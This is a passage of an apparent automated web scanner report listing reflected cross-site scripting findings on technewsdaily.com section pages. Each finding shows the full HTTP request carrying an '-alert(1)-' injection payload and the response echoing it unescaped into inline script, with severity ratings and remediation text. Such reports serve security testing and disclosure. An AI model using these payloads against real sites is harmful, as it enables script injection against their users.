HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:23 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:23 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40450
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/sectionca2ef'-alert(1)-'8e30d5ca4ef/military-spy-tech/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.158. http://www.technewsdaily.com/section/military-spy-tech/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/section/military-spy-tech/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58568'-alert(1)-'2ecfd29c056 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section/military-spy-tech/?58568'-alert(1)-'2ecfd29c056=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:18 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:18 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 44689
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section/military-spy-tech/?58568'-alert(1)-'2ecfd29c056=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2614d'-alert(1)-'b77dab4c3fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section2614d'-alert(1)-'b77dab4c3fd/mobile-life HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:53 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:53 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40434
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section2614d'-alert(1)-'b77dab4c3fd/mobile-life",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.160. http://www.technewsdaily.com/section/mobile-life [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/section/mobile-life
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 758e6'-alert(1)-'f992cee1521 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section/mobile-life?758e6'-alert(1)-'f992cee1521=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:48 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:48 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46174
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section/mobile-life?758e6'-alert(1)-'f992cee1521=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc0e3'-alert(1)-'26b9f06a672 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sectionbc0e3'-alert(1)-'26b9f06a672/mobile-life/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:26 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:26 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40438
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/sectionbc0e3'-alert(1)-'26b9f06a672/mobile-life/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.162. http://www.technewsdaily.com/section/mobile-life/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/section/mobile-life/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0429'-alert(1)-'af79c163a51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section/mobile-life/?b0429'-alert(1)-'af79c163a51=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:21 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:21 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46192
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section/mobile-life/?b0429'-alert(1)-'af79c163a51=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33688'-alert(1)-'a99c01f62d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section33688'-alert(1)-'a99c01f62d7/social-media HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:50 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:50 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40436
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section33688'-alert(1)-'a99c01f62d7/social-media",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.164. http://www.technewsdaily.com/section/social-media [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/section/social-media
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 584c4'-alert(1)-'ed2b184271d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section/social-media?584c4'-alert(1)-'ed2b184271d=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:45 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:45 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 45229
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section/social-media?584c4'-alert(1)-'ed2b184271d=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21db8'-alert(1)-'b8aa64b0900 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section21db8'-alert(1)-'b8aa64b0900/social-media/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:28 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40440
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section21db8'-alert(1)-'b8aa64b0900/social-media/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.166. http://www.technewsdaily.com/section/social-media/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/section/social-media/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ce66'-alert(1)-'5ea401b52b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section/social-media/?8ce66'-alert(1)-'5ea401b52b=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:22 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 45245
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section/social-media/?8ce66'-alert(1)-'5ea401b52b=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cae9c'-alert(1)-'ff4a4a14a1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sectioncae9c'-alert(1)-'ff4a4a14a1d/software HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:55 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:55 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40428
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/sectioncae9c'-alert(1)-'ff4a4a14a1d/software",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.168. http://www.technewsdaily.com/section/software [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/section/software
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 694a5'-alert(1)-'a545607c0a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section/software?694a5'-alert(1)-'a545607c0a1=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:49 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:49 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 45426
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section/software?694a5'-alert(1)-'a545607c0a1=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 722e7'-alert(1)-'0ef6bed6e78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section722e7'-alert(1)-'0ef6bed6e78/software/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:32 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:32 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40432
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section722e7'-alert(1)-'0ef6bed6e78/software/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.170. http://www.technewsdaily.com/section/software/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/section/software/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f267'-alert(1)-'016a32755f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section/software/?1f267'-alert(1)-'016a32755f9=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:26 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:27 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 45444
